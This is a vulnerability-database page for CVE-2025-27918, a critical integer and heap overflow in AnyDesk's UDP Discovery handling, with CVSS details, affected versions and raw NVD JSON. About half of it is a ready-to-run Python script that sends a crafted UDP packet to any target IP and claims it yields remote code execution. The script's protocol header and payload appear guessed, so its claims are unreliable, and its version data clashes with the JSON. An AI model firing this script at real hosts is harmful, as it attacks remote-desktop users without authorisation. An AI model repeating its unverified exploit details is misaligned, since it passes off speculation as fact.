Security Vulnerability Report
中文
CVE-2025-27918 CVSS 9.8 CRITICAL

CVE-2025-27918

Published: 2025-11-06 18:15:41
Last Modified: 2025-12-08 17:16:14
Source: [email protected]

Description

An issue was discovered in AnyDesk for Windows before 9.0.5, AnyDesk for macOS before 9.0.1, AnyDesk for Linux before 7.0.0, AnyDesk for iOS before 7.1.2, and AnyDesk for Android before 8.0.0. It has an integer overflow and resultant heap-based buffer overflow via a UDP packet during processing of an Identity user image within the Discovery feature, or when establishing a connection between any two clients.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:anydesk:anydesk:*:*:*:*:*:windows:*:* - VULNERABLE
AnyDesk for Windows < 9.0.5
AnyDesk for macOS < 9.0.1
AnyDesk for Linux < 7.0.0
AnyDesk for iOS < 7.1.2
AnyDesk for Android < 8.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-27918 PoC - AnyDesk Integer Overflow Heap Overflow # This PoC demonstrates sending a malicious UDP packet to trigger the vulnerability import socket import struct import sys def create_malicious_packet(): """ Create a malicious UDP packet to trigger integer overflow in AnyDesk's image processing """ # AnyDesk protocol header header = b'ADSP' # AnyDesk Service Protocol # Packet type for identity/image data packet_type = b'\x00\x02' # Image data packet # Trigger integer overflow with large size value # When multiplied or processed, this causes integer overflow malicious_size = struct.pack('<I', 0xFFFFFFFF) # Max uint32 value # Malicious payload that will overflow the heap buffer overflow_data = b'A' * 10000 # Large payload that exceeds allocated buffer # Construct the packet packet = header + packet_type + malicious_size + overflow_data return packet def exploit_anydesk(target_ip, target_port=5001): """ Send malicious packet to AnyDesk client Args: target_ip: Target AnyDesk client IP address target_port: AnyDesk UDP port (default: 5001) """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) packet = create_malicious_packet() print(f'[+] Sending malicious packet to {target_ip}:{target_port}') sock.sendto(packet, (target_ip, target_port)) print('[+] Packet sent successfully') print('[+] If vulnerable, this should trigger heap overflow and RCE') sock.close() return True except Exception as e: print(f'[-] Error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: {sys.argv[0]} <target_ip>') print('Example: python3 {sys.argv[0]} 192.168.1.100') sys.exit(1) target = sys.argv[1] exploit_anydesk(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-27918", "sourceIdentifier": "[email protected]", "published": "2025-11-06T18:15:40.793", "lastModified": "2025-12-08T17:16:13.713", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in AnyDesk for Windows before 9.0.5, AnyDesk for macOS before 9.0.1, AnyDesk for Linux before 7.0.0, AnyDesk for iOS before 7.1.2, and AnyDesk for Android before 8.0.0. It has an integer overflow and resultant heap-based buffer overflow via a UDP packet during processing of an Identity user image within the Discovery feature, or when establishing a connection between any two clients."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anydesk:anydesk:*:*:*:*:*:windows:*:*", "versionEndExcluding": "9.0.0", "matchCriteriaId": "6723BE07-6C0A-4ACE-A0C0-E17CFA300F88"}]}]}], "references": [{"url": "https://anydesk.com/en/changelog/windows", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://dspace.cvut.cz/bitstream/handle/10467/122721/F8-DP-2025-Krejsa-Vojtech-DP_Krejsa_Vojtech_2025.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.